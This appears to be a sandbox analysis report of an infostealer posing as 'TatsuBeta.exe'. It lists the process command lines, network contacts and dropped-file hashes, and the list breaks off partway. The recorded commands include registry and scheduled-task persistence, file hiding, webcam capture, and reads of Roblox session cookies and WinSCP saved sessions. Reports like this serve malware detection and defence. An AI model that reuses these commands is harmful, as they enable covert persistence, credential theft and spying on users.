cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupmub5Xr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupmub5Xr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupmub5Xr /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\yK7B6ZU7EPk60SD5OtRS\System\cam.5028_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\yK7B6ZU7EPk60SD5OtRS\System\cam.5028_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_mub5Xr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs\"""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs\""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_mub5Xr /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs /f

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_mub5Xr.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutwVCt1.ps1" -RunAsAdministrator"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutwVCt1.ps1" -RunAsAdministrator

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.178.66.33:443 api.gofile.io tcp
US 8.8.8.8:53 store6.gofile.io udp
US 136.175.8.205:443 store6.gofile.io tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 205.8.175.136.in-addr.arpa udp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 github.com udp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\d3dcompiler_47.dll

MD5 c1e9c5d58adb8f91dcd9793520676b14
SHA1 422e28f2ed9cdd55b21d52a9cf09084f1a987d34
SHA256 95b01b5c8cf10a4411f103babdbb19f20504b6b5198828a78337251ddaadf6ed
SHA512 63395fcb7fef1b4764359ed76b4982b4062b2fb0f2bbe7d104154d428237e0077248e9b172ce20a3b7a705439a11bf11d628105ee4c6ec1b020140368b353265

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\ffmpeg.dll

MD5 c3842fb3087cdcdb04020ac38683c289
SHA1 329dbcd4a1c79b891b200f11eb50194b85c493bc
SHA256 e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133
SHA512 069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\icudtl.dat

MD5 3a93260229c422ac1f5e6275b47d356c
SHA1 f6be074b7200cd26b0a0ab2f5f508644925c4d15
SHA256 54d6f1a52e58eb6f758f24ad7facddbf61950b5c4721a963df91831175f2443f
SHA512 0ba6c9b0cc41e706103c4b395e3d5aebb95d5e952bf368f9211ba4f73e5e30f1f2d452d9699aed50fc4ae4061bb27d0cd6729be825f4aeaf80f09975449d8b35

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\libGLESv2.dll

MD5 194d7c44d70b7f70674de1d8f33e9cc6
SHA1 2b25e76833d3f5d4b426e7d54c69d46f202c7813
SHA256 9828384c34e6b49666d3a0ea4866df0e1583741ee58cc0745cf93b81acbf1f41
SHA512 6aa2358a611355c7bc968c051deff7f54725d834ad2807d14f120d5c548f0e501857659ac35563b3fbc659559dbbb2a1d61ef7508179e81b55a564cc98fdbb2a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\LICENSES.chromium.html

MD5 017a4492be8838e38b0368344ebc6788
SHA1 04a7db1b333c8ddd3c30b1a1da6d00515a132274
SHA256 f55f228861ff34514e4c498abda27ae0020fc04f646def9daff368ab15065ce7
SHA512 c02087f0fbd32336881b2154861d4c1e9ee5d990e5ab0e51fca8b2a559dff6d781aba372cb29d22345d12bed3b6691f75e881bb02c293ba1f67936eef65519ea

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\snapshot_blob.bin

MD5 c9ab741bbef53fa0e84952b8891a5f5a
SHA1 e2dcb8d034e07243537c86371de0c52bce62cee1
SHA256 4d82fe1e642fe3ca7ad1a173f806088c0652ecfe9f0f6f6e246066e15a3431d4
SHA512 177b98a3090ecfe4b4598dfcd7e8b3ca49efafba4dbd8d6c6d0def462de47c3fabfde831725622783ddc177de982de6115178d9bd9830d918bb544a5a4c27fc9

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources.pak

MD5 c0d714e8e717aaf611448d49e98a8ab4
SHA1 1d63f0faef0c2b8ef76653f5aab17916bc6e1cd9
SHA256 7f0aa4d14d9dc0c035a2112abe32c0fa743366de66ea002813d8d6ed884c7780
SHA512 95e892e0ab62880839db98efcb4dabd9509161515015e4bca8d8eafd9e4f6574c51b7414459bef8f51ec4e9749ae10a466c48779d34592a4b362120b98cf921b

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\TatsuBeta.exe

MD5 be02892a09101c2dde22b42a113c1a48
SHA1 4fa76ae4f206bda835dbd50622515273e3f32bc6
SHA256 5ea9f3702cc51b5db39b23a38a1a406ea3731d49d708d77fcb8d8f8e6b82c172
SHA512 0e2b9b926c87e6a0b765cdbdf8223e60bd24f5b0ec4c7607ce2f5f1b68ac71627badd477e05b9f43ec506df8d1693e12d309ca5906ca403bc0545686e0cca437

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\v8_context_snapshot.bin

MD5 47014c0f81bad6d216c617c9c63bf040
SHA1 7bb483fdc5fed3c6ed437d9fe6e5023bc38201bf
SHA256 e1249d05bfc73c645b27d269f47b6923b33a3cf8088a8ca78b3b637c90f58178
SHA512 052d86cf3305a9e493bd2472e6b7ddab5e0291efd6d899984a79bae46e5fa4bd21157e19ab4a2591c9cff9069de568bad18c7baf4f35d117c77134e635466f87

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\vk_swiftshader.dll

MD5 f1ced32167aebf96552b4349e8ffb074
SHA1 0b97a83946665e3f0fa5f16263a4e56701da6fbe
SHA256 f22e0cfa64cd1be8c9ef6797cfeb4f63a99cb00da83535a1800177134697be2b
SHA512 bed7764ffea2f51721aaaadbddadcd096df9bb1ec5b26f4ed8e5c9066d0649d12073fa8b1afb31a42d4a1b55b2a9ea7da4a9b35a8b43c5ebe2acb7b7405c601d

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\vulkan-1.dll

MD5 b91586bd80e057a7f62bdc4422744812
SHA1 a1df644421ece2e740e5bf0ed98b4f269fd85c39
SHA256 8ba72d98e0f78b77bda7816cd7232809d287310d34e0f1d7472b9d5fda2c6d02
SHA512 94f0a8e3e75e4803891c0fcb257052dbe0e7399772fc7a46ab802629f76ee580ed30b3678fa6bc3744c12cf9f3103bbc8276e88f6711278748148e9fbeef2053

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\bg.pak

MD5 5ba0c7200362c9ed55610cc8b66ef53c
SHA1 d45239c2f1b00885407771a41a7776fc1fe8fa3b
SHA256 2339ff55464b4ff704fc3c5bf281eec52a539c494bd059cf0346d9c05ab7cda7
SHA512 6229dbf08a9322c4ec8de4912aa1832f01800a71b7e3ef5870e7fa2b623be4dd248fec4881c3e031e984616147be84d42ab3dd970ae56dc1bd78913a8682a37a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ar.pak

MD5 6f3e791b4d35ee7d9515614d128752cf
SHA1 181ec3a84fb3e89336d77f24f562a2cbe07619d8
SHA256 e9df0fa338b763a3926c4ee3a87bedf650fa618b6fcf0560c3f5ffe891d48c60
SHA512 3657e610d13a2c938558ec320c298dd490c9e4895ccd304f738aaa2f050373efd7382ca402365f93d23ed488bae82de2d859da788dc8faa8e621346a278f4441

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\am.pak

MD5 e18a450ef034b42599341c3d09f280f1
SHA1 2001c8a85904962ac3a96938eccc69ad2c110fdf
SHA256 7c2b9098130f1f9e0cf4507b64c0e96ac6354bd6c3616be20e2067cfccc820da
SHA512 ddd87571218fe9f179a6c2a8a15b182625a71a7c19ed90c0969ca2e0e9bad823b926f8b8a6b390cb6fe9c95f4b6c1f1ec7b5167a8424ab1921943922208f798a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\bn.pak

MD5 47c95e191e760dee3ef43345577e2379
SHA1 609634315270a91d4ec631642b18bd0036367aad
SHA256 ceed32e429ed1018d4c49343cf52105cbfd1e877c531a5738fd6e6cd33d27da7
SHA512 46b5f8d58780d19e79136c31a67d075c57ddf7e6a1eb197dea4088cc414a0dc24a68fc8ebcaac03b3940af2461123b586706d5dbf8dbdf6fbea0f7bec466db21

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\de.pak

MD5 b73344e5a72fca6f956dbab984c123ba
SHA1 0561073aa40a63a9ce9930dd18b18e12ff139b2b
SHA256 6dda3fa65232ca0bff7314f916942a2aa5d9be73a0b0c7a6d016eb34ea6fff5b
SHA512 e8a12da397369f23c102244b3f18f533ec79afa6978785566056bbfe07b10a21ff4973bf17aa829fff65609363988c033b0e48d4a82c846863377c08d8df009d

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\da.pak

MD5 55a8f5883805a65c854d25edb3959209
SHA1 d4b3b6bd2a26cbd021fa931d1f63c9ea64e2c268
SHA256 e190187adcbb5f829d162660968ba598ed17bd11339062ca4d807deec8a27fdb
SHA512 4e1f9e6da32f553cbc8cf162726d7aba9e23e2216d6d05b995cf19fff3aafa05ed08fce29b2f8538d46583366402b8630672e650dfbd46952a611e9db0d8016d

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\cs.pak

MD5 3cfd9dc564cfcc33cc5524711365c376
SHA1 2e5016d2643017f37658262122974429f18625a2
SHA256 8be34e4f8226c1dd4e725711ddd884ef4476560f7863edcf378573dde9db3cee
SHA512 6ee156d2fa3b6f601df28e38968d0eae2812d70b41333348dbecd833d5ee6ff944183f0eecde96be433cf1e98c8ec22d6a6d5af5153145842175ab43c73533ef

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ca.pak

MD5 423651c45566cd90ea5edd8631e823b8
SHA1 13bed4173a08bcbfefba034aada3d838eece6d16
SHA256 7a39af99d55a1ea838d8d78c5f0da3e1402f9404d32255e31b676ceed4f0e414
SHA512 e09085023beaa37e9d5f7fdf3c32d0c001672b85e2826f0aba9a662ce958ac93cac17bf63495a604e47cb407b1593049388a4bf1b22b2339ead84a206a10569f

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\el.pak

MD5 38440b98bfdf5ed496da0f49d59534c0
SHA1 1498d9207ecaf4923a47271e24c68a817041c82e
SHA256 b1f78df8a7edc914357a2e90bc8dc0ac46f4df642bb22894569fe4905fb8ea0f
SHA512 95ba788fc2e1f07d54e398f1ec4d32c664cfb13118d46cb7af7a993367e032b10de84f3e604ab6e659d6410e2d736097ec5e9b3b002040c54412358f0ea10229

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\en-GB.pak

MD5 52e2826fb5814776d47a7fcaf55cb675
SHA1 51fbbc59dcd61116cbc0a24b0304d4c1c58e8d0b
SHA256 83ff81c73228c7cadba984d9b500e4fce01de583ecde8f132137650c8107c454
SHA512 69257f976d01006c5f3d7e256738c97c59115471f8e7447cfa795f7fa4ff12d6fd19708e95ffb2aa494b50c1763fe35d5885b9414112d2934baf68fe668ed7cc

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\es-419.pak

MD5 b261b1efe945365588befdf68879040f
SHA1 616f44a5f73f0449b483f36ccf831db6474a10d2
SHA256 1380b9edc9cee4b505f12e8eefa288d8c746ca995b52ceaba27c7741ae8a5cd4
SHA512 9ea14234b9d4d09364e5727b3886fc14544d52508b3e45fb9fd607ca88d2e432361a02b2f7ba34c3d6ecd94b91f9eccd4d54047a97a1ba4eea580ead00b91cff

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\fr.pak

MD5 c3095ce1e88b0976ba7bef183d047347
SHA1 b14cfbf6e46ac1f189595fc09660178525301138
SHA256 66488dc10517b6e3638686be95b430477a39304e92ac45dfe62b58cae3a77272
SHA512 29f47b1eff4681a9a17a50d6e82d63c22fe7bfe4ceb79862e81d8cd9f96fa38e225978b4c4b1f8e55b220235b91652c776fa8d2e559c68942c6ccf402812a421

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\gu.pak

MD5 63a7fdc4eadf8ef1c35c72468a0ce33f
SHA1 e8d064f0e9c8a6a8c6ccb036711e292d011d9466
SHA256 e549ff4e5a094d04c2ce7bc6fd68bea1f03e935437bf164bebb6191c133fa70c
SHA512 0a097ff875132a984545ec677b04f97785f14c38a1df487cfb4722cdea07d14e1e88fcff7d58b82fa53f05f4eba779a95ef320b5a91692097726d0385a26a456

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\he.pak

MD5 6a02a37e1ca3215fa9ee0e1b0fbcf5e7
